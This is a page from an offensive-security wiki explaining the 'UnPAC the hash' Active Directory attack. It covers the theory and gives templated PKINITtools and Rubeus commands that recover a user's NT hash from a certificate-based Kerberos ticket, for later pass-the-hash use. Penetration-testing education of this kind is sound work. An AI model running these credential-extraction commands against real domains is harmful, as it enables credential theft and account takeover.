The Hacker Recipes
GitHubTwitterExegolTools
Search…
Introduction
Active Directory
Reconnaissance
Movement
Credentials
MITM and coerced auths
NTLM
Kerberos
Pre-auth bruteforce
Pass the key
Overpass the hash
Pass the ticket
Pass the cache
Forged tickets
ASREQroast
ASREProast
Kerberoast
Delegations
Shadow Credentials
UnPAC the hash
Pass the Certificate
sAMAccountName spoofing
SPN-jacking
DACL abuse
Group policies
🛠️ Trusts
Built-ins & settings
Netlogon
Certificate Services (AD-CS)
Exchange services
Print Spooler Service
Persistence
Web services
Reconnaissance
Configuration
Accounts and sessions
User inputs
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ mobile apps
Android
iOS
Powered By GitBook
UnPAC the hash

Theory

When using PKINIT to obtain a TGT (Ticket Granting Ticket), the KDC (Key Distribution Center) includes in the ticket a PAC_CREDENTIAL_INFO structure containing the NTLM keys (i.e. LM and NT hashes) of the authenticating user. This feature allows users to switch to NTLM authentications when remote servers don't support Kerberos, while still relying on an asymmetric Kerberos pre-authentication verification mechanism (i.e. PKINIT).
The NTLM keys will then be recoverable after a TGS-REQ through U2U which is a Service Ticket request made to the KDC where the user asks to authenticate to itself (User-to-User authentication).
The following protocol diagram demonstrates how UnPAC-the-hash works. It allows attackers that know a user's private key, or attackers able to conduct a Shadow Credentials attacks, to recover the user's LM and NT hashes.

Practice

UNIX-like
Windows
From UNIX-like systems, this attack can be conducted with PKINITtools (Python).
The first step consists in obtaining a TGT by validating a PKINIT pre-authentication first.
gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
Once the TGT is obtained, and the session key extracted (printed by gettgtpkinit.py), the getnthash.py script can be used to recover the NT hash.
export KRB5CCNAME="TGT_CCACHE_FILE"
getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
The NT hash can be used for pass-the-hash, silver ticket, or Kerberos delegations abuse.
From Windows systems, Rubeus (C#) can be used to requesting a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show

Resources

Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover
Shenanigans Labs
SSTIC2014 » Présentation » Secrets d'authentification épisode II : Kerberos contre-attaque - Aurélien Bordes
Previous
Shadow Credentials
Next
Pass the Certificate
Last modified 3mo ago
Copy link
On this page
Theory
Practice
Resources